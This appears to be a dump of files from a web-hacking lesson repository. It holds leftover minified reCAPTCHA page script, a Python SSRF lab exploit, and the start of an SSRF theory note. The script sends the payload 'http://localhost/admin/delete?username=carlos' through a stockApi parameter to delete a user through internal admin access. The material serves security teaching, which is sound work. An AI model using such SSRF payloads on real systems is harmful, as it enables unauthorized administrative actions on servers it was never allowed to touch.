grecaptcha!="undefined"){if(isGRecaptchaV2(i)){for(r=document.getElementsByName("g-recaptcha-response");r.length!==0;)r[0].name="RecaptchaV2Token";t(i);return}u=document.getElementById("RecaptchaClientSecret-"+i).value;grecaptcha.ready(function(){grecaptcha.execute(u,{action:n}).then(function(n){document.getElementById("RecaptchaToken-"+i).value=n;t(i)})})}},isGRecaptchaV2=function(n){var t=document.getElementById("RecaptchaRenderLocation-"+n);return t&&t.children.length>0},removeRecaptchaMasks=function(){var n=document.querySelectorAll(".recaptchaloadingmask");n.forEach(n=>n.classList.remove("recaptchaloadingmask"))},renderRecaptchaV2=function(n){var t,i;typeof grecaptcha!="undefined"&&(t=document.getElementById("RecaptchaRenderLocation-"+n),t.children.length===0?(i=document.getElementById("RecaptchaV2ClientSecret-"+n).value,grecaptcha.ready(()=>{grecaptcha.render(t,{sitekey:i})})):resetAllV2Recaptchas())},resetAllV2Recaptchas=function(){for(var 
t=document.querySelectorAll("[id^='RecaptchaRenderLocation-']"),i=Array.from(t).filter(n=>n.children.length>0),r=i.length,n=0;n=0;n--)t[n].classList.add("hidden");else removeRecaptchaMasks();typeof recaptchaEventSetup=="undefined"&&(recaptchaEventSetup=!0,document.readyState==="complete"||document.readyState==="interactive"?loadRecaptchaScript():document.addEventListener("DOMContentLoaded",loadRecaptchaScript))},loadRecaptchaScript=function(){if(typeof recaptchaClientUrl!="string"){recaptchaErrored();return}var t=document.querySelector("[id^='RecaptchaClientSecret-']").value,n=document.createElement("script");n.id="RecaptchaScript";n.async=!0;n.src=recaptchaClientUrl+t;n.onload=function(){var t,n;for(removeRecaptchaMasks(),t=document.getElementsByClassName("disable-no-recaptcha"),n=t.length-1;n>=0;n--)t[n].classList.remove("hidden")};n.onerror=function(){recaptchaErrored()};document.querySelector("body").appendChild(n)},recaptchaErrored=function(){removeRecaptchaMasks();document.querySelectorAll("[id^='NoRecaptcha-']").forEach(n=>{n.classList.remove("hidden")})},initOwnCaptcha=function(n,t){document.getElementById("CaptchaRefresh-"+n).addEventListener("click",refreshCaptchaImageEventHandler);document.getElementById("RecaptchaToken-"+n).addEventListener("keypress",t)},initCaptcha=function(n,t){isRecaptchaEnabled()?initRecaptcha():isOwnCaptchaEnabled()&&initOwnCaptcha(n,t)},refreshCaptchaImageEventHandler=function(n){var t=n.target.closest("[id^='Recaptcha-']").querySelector("[id^='CaptchaImg-']");refreshCaptchaImages(t);n.preventDefault()},refreshCaptchaImages=function(n){var i,t;(n||(n=document.querySelector("[id^='CaptchaImg-']")),n)&&(i=n.src.includes("refresh=true"),i||(t=document.querySelectorAll("[id^='CaptchaImg-']"),n.addEventListener("load",()=>{for(var i=0;i{if(n.includes(t))return!0})},isRecaptchaError=function(n){return 
recaptchaErrors.map(n=>n.toLowerCase()).includes(n.toLowerCase())};_widgets=_("[id^='RegistrationWidget-']");initRegistrationWidget(_widgets) -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/saved_resource(1).html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/saved_resource.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/tailored-quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/tailored-quote.png -------------------------------------------------------------------------------- /lesson_notes/w-9.0_ssrf/ssrf_lab1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import requests 4 | import sys 5 | import urllib3 6 | 7 | 8 | 9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 10 | 11 | def argv_check(): 12 | if len(sys.argv) != 2: 13 | print("[!] Usage : %s " %sys.argv[0]) 14 | print("[!] 
Example : %s google.com" %sys.argv[0]) 15 | 16 | 17 | def del_user(url): 18 | #url = sys.argv[1] 19 | path = "/product/stock" 20 | ssrf_payload = "http://localhost/admin/delete?username=carlos" 21 | params = {"stockApi":ssrf_payload} 22 | 23 | 24 | r = requests.post(url+path,data=params,verify=False) 25 | 26 | def check_exploit(url): 27 | path = "/product/stock" 28 | check_params = "http://localhost/admin" 29 | params = {"stockApi":check_params} 30 | 31 | 32 | r = requests.post(url+path,data=params,verify=False) 33 | if "User deleted successfully" in r.text: 34 | print("[+] User carlos deleted successfully") 35 | else: 36 | print("[-] Exploit Fail") 37 | 38 | 39 | 40 | def main(): 41 | url = sys.argv[1] 42 | argv_check() 43 | print("[+]Deleting user carlos....") 44 | del_user(url) 45 | check_exploit(url) 46 | 47 | 48 | 49 | 50 | 51 | if __name__== "__main__": 52 | main() -------------------------------------------------------------------------------- /lesson_notes/w-9.0_ssrf/ssrf_theory.md: -------------------------------------------------------------------------------- 1 | # Server Side Request Forgery (SSRF) 2 | 3 | ## SSRF Vulnerability 4 | 5 | ![SSRF](../photo/ssrf1.png) 6 | 7 | - SSRF stands for Server Side Request Forgery. It is a type of web application vulnerability that allows an attacker to make unauthorized requests from a vulnerable server to other internal or external servers. 8 | 9 | 10 | - A successful SSRF attack can result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. 11 | 12 | ## OWASP Top 10 vulnerability 13 | ![Top-10](../photo/ssrf2.png) 14 | 15 | 16 | ## Example Vulnerable Code 17 | 18 | ```php 19 |